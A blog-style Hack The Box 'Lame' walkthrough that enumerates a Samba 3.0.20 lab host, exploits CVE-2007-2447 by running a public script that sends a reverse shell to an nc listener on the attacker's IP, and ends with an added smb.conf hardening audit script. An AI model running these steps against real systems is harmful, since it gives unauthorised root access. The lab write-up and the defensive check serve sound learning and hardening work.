HacktheBox — Lame Walkthrough

serkanbenol
4 min read, Jul 6, 2022

Hello all! This is my second OSCP-like machine walkthrough. Let’s start!

Attacker IP: 10.10.14.53 ; Target IP: 10.129.77.189

1. nmap -Pn -sVC 10.129.77.189
  • -Pn : skip host discovery (do not ping the target machine)
  • -sVC : version detection plus the default scripts (-sV and -sC combined)

2. The results:

  • 21/tcp : ftp service with vsftpd 2.3.4
  • 22/tcp : ssh service with OpenSSH 4.7p1
  • 139/tcp : netbios-ssn, Samba smbd 3.X-4.X
  • 445/tcp : netbios-ssn, Samba smbd 3.0.20

3. We see that ftp allows anonymous login. Let's check whether it holds any valuable information:
ftp 10.129.77.189

4. Although the login succeeds, there is nothing interesting here.

5. Let's try the Samba ports 139 and 445 with smbmap. This is a handy enumeration tool that lists shares, their permissions, etc.
You can find it here: https://github.com/ShawnDEvans/smbmap
The main command is: smbmap -H 10.129.77.189 where -H denotes the target host.

The tmp share is interesting: we have read and write permissions on it. However, smbclient does not let us connect:
smbclient -N //10.129.77.189/tmp

It turns out that newer smbclient versions refuse the insecure (legacy) protocol versions by default; one way around this without touching the configuration file is to specify the accepted protocol in the command itself.

Even then we found nothing on the share. Now let's look for public exploits for Samba 3.0.20.

6. searchsploit 3.0.20

There is a command execution exploit here; however, it is a Metasploit module, which is beyond our aim. Its CVE can still be looked up with the command:
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE

It's CVE-2007-2447. The next step is googling it.

7. There is a nice Samba exploit script for this CVE in this GitHub repo:
https://github.com/amriunix/CVE-2007-2447

8. The next step is cloning the exploit:
git clone https://github.com/amriunix/CVE-2007-2447.git

9. To use the script we need to install pysmb:

pip3 install pysmb

10. Before using the exploit let’s open a listener with netcat:
nc -lvnp 4444

11. The next step is running the script:
python3 usermap_script.py 10.129.77.189 139 10.10.14.53 4444

Looks like we're root! Congrats. The next step is upgrading to a more interactive shell and finding the flags:
python -c 'import pty; pty.spawn("/bin/sh")'

Let's find user.txt this time.
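As an added example (not code from the original walkthrough or from the CVE-2007-2447 repository), the following Python script audits an smb.conf for the two conditions this box depended on: the username map script setting that CVE-2007-2447 abuses, and a share that is both guest-accessible and writable like tmp. Both config texts are constructed; the share path and the script path are assumptions.

```python
import configparser

# Added example, not the walkthrough's code. Both configs are constructed;
# the share path and the map script path are assumptions.
WEAK_SMB_CONF = """
[global]
    security = user
    username map script = /etc/samba/scripts/mapusers.sh
[tmp]
    path = /tmp
    read only = no
    guest ok = yes
"""
# Same server with the CVE-2007-2447 vector removed and guest access closed.
HARDENED_SMB_CONF = """
[global]
    security = user
[tmp]
    path = /tmp
    read only = no
    guest ok = no
"""
YES, NO = ("yes", "true", "1"), ("no", "false", "0")

def parse_smb_conf(text):
    # Samba keys are case-insensitive; configparser lowercases them for us.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return cp

def audit_smb_conf(text):
    # Returns (section, setting, reason) tuples for each risky setting found.
    cp = parse_smb_conf(text)
    findings = []
    # 'username map script' is the setting CVE-2007-2447 abuses on Samba 3.0.20.
    if cp.has_option("global", "username map script"):
        findings.append(("global", "username map script",
                         "remove the setting or upgrade Samba"))
    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]  # Samba synonym: 'writable = yes' inverts 'read only'
        writable = (s.get("read only", "yes").lower() in NO
                    or s.get("writable", "no").lower() in YES)
        guest = s.get("guest ok", "no").lower() in YES
        if writable and guest:
            findings.append((share, "guest ok + writable",
                             "anonymous users can write to this share"))
    return findings
```

Running audit_smb_conf over a real /etc/samba/smb.conf after an upgrade confirms that neither the vulnerable setting nor an anonymous writable share is left behind.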
